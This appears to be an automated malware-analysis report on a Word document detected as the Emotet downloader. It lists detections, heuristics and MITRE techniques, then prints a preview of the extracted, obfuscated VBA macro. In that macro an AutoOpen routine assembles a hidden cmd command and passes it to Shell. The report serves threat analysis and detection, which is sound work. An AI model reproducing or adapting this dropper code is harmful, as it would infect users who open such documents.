MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro, which is a common characteristic of Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and runs a secondary payload. The ClamAV detection explicitly identifies it as Doc.Downloader.Emotet.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6787869-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6787869-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11596 bytes |
SHA-256: 8ee9cd36360acbb943f6df887635fd874a6abfe4d5a31f110830832408e467f2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jKoJTiHJWESm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(zvmAGf)
TypeName 273
TypeName CBool(QpZmP)
TypeName CByte(lAUaGi)
TypeName Log(qRKzr)
Shell@ KeyString(vbKeyC) + zszkGupTJUJ + fAWnlRtSDYY + zdzFzf + Ljsbi + ThbabuGi + oOAiIMcO + HnTRAdVipt + OjawniTzCKd + wELqEKiAW + YCmUOQrBfR + zKtJkKZPboDU + UafSIoziOfGWpj, 267501602 - 267501602
TypeName CDbl(62)
TypeName wlGNf
TypeName 291
End Sub
Attribute VB_Name = "bbEwSbp"
Function zdzFzf()
On Error Resume Next
TypeName Hex(97104 + NXPCi)
TypeName lHSjj
riuNqtnCPuh = "md " + "/" + "V:O" + "/C" + CStr(Chr(SYpcnZA + MdKsNDNz + 34 + btzSpJE + lHSMjCprHlS)) + "se"
TypeName CBool(WoNNhX)
TypeName ChrW(oIbipv)
DaHZGO = "t " + ". " + "=m" + "Em" + "Ji" + "aj" + "In" + "PNs" + "vL" + "L" + "jLV" + "fkp"
TypeName CBool(MwdDKG / 8799)
TypeName ZzvXF
TypeName Rnd(90)
LUOOrZuj = "fi" + "v5=" + "/" + "c" + "zxd" + "lY"
TypeName kPfqI
TypeName CBool(63)
nWWXGrzjdS = ";'" + "t0}" + "@" + "4G" + "w)("
TypeName CByte(WjpcJK)
TypeName 669
TypeName Sgn(tkkqVB / fjiiQ + nAczW + LhJloo)
lCZXfAJj = "M\b" + "31W" + "T" + "8rF" + "-D:" + "{" + "S" + "o" + "h"
zdzFzf = riuNqtnCPuh + DaHZGO + LUOOrZuj + nWWXGrzjdS + lCZXfAJj
TypeName Cos(SEzPD * mXCNkz)
TypeName HCDbY
TypeName 1914
End Function
Function Ljsbi()
On Error Resume Next
TypeName CSng(HGkmZW * jQTsCF)
TypeName CDate(XaJwoC - rsHAt)
jjTajD = " u" + "e" + "C7+" + ".gy" + ",$Q" + "&&f" + "o" + "r" + " %S"
TypeName ChrB(bJMKM)
TypeName tfDjf
RdJDjN = " " + "i" + "n " + "(" + "20" + ";" + "59;" + "41" + ";6" + "3" + ";"
TypeName CStr(ioJdN)
TypeName Sqr(uiOUq)
TypeName CSng(6116 + XduGzN / 43421 / jrKpEm)
AWAAzFjKni = "5" + "2;" + "1" + "1" + ";60" + ";6" + "3;" + "3" + "1;" + "31;" + "61;" + "71"
TypeName ChrB(378051836)
TypeName JQufbM
DIEuY = ";50" + ";8;" + "64" + ";" + "25;" + "8;" + "63" + ";41" + ";5" + "4"
TypeName 6744
TypeName Log(220364817)
VnLlrFu = ";" + "5" + "9" + ";" + "46;"
TypeName Sqr(2296)
TypeName ChrW(ScWXPK)
jAGbwNjlN = "15" + ";63" + ";27" + ";" + "35" + ";"
TypeName Rnd(UEPBZ)
TypeName GpPQSq
FpBQZAz = "6" + "1" + ";" + "10;" + "63" + ";35" + ";" + "67" + ";49" + ";6" + "3" + ";"
TypeName Sgn(6)
TypeName Sqr(nCXhL / lZLLm - 10724 * BMFPhn)
SUfipPFApD = "46;" + "64" + ";" + "31;" + "2" + "2" + ";" + "6" + "3" + ";8" + ";35"
TypeName CStr(34325 + NQuWP / LWmDqE / DiLTs)
TypeName UwABr
MvcKqOmpUzF = ";" + "3" + "3;7" + "1;" + "49;" + "3" + ";7" + ";2" + "5;" + "34" + ";6"
TypeName Int(3)
TypeName CDbl(QJrdD)
TypeName CStr(9)
bjtILquhm = "0;3" + "5;3" + "5;" + "2" + "0;" + "56" + ";" + "26" + ";26" + ";41"
TypeName Hex(20821 * 94515 * pIouEh * UdnzKm)
TypeName Cos(luZKUI)
TypeName CLng(BtJZoD / zGDKBm / rSQRo / zNjKrA)
QjNBSdHu = ";" + "4" + "1;" + "41" + ";6" + "7;" + "46;" + "22;" + "59;" + "21" + ";52" + ";63" + ";1"
TypeName Sgn(aIFnkO)
TypeName Rnd(JwdWW)
TypeName Chr(unNwho - zLLiA + 62313 + hhVmcj)
qIZBzwUaASf = "1;2" + "7;5" + "9;" + "6" + "7;" + "2" + "7" + ";" + "59" + ";2;" + "6" + "7;2"
TypeName Fix(qqiOVK * TSlDY - 23387 / PjjXqb)
TypeName Chr(ozGRpz)
TypeName wAqpis
uaHziJjuSwG = ";2" + "9;" + "26;" + "46;" + "22;" + "38;" + "60" + ";3" + "5;3" + "5"
Ljsbi = jjTajD + RdJDjN + AWAAzFjKni + DIEuY + VnLlrFu + jAGbwNjlN + FpBQZAz + SUfipPFApD + MvcKqOmpUzF + bjtILquhm + QjNBSdHu + qIZBzwUaASf + uaHziJjuSwG
TypeName lINzu
TypeName Sin(RvviW)
End Function
Function ThbabuGi()
On Error Resume Next
TypeName OAsKA
TypeName CInt(AmUMT * bwcEz)
TypeName Log(67191 - liWWzo - 59621 / sjaiS)
vjSVOFlCtF = ";20" + ";5" + "6;2" + "6" + ";26" + ";4" + "6;" + "59;" + "2" + "9;" + "4" + "6;" + "62"
TypeName CLng(74958799)
TypeName ThXcQa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.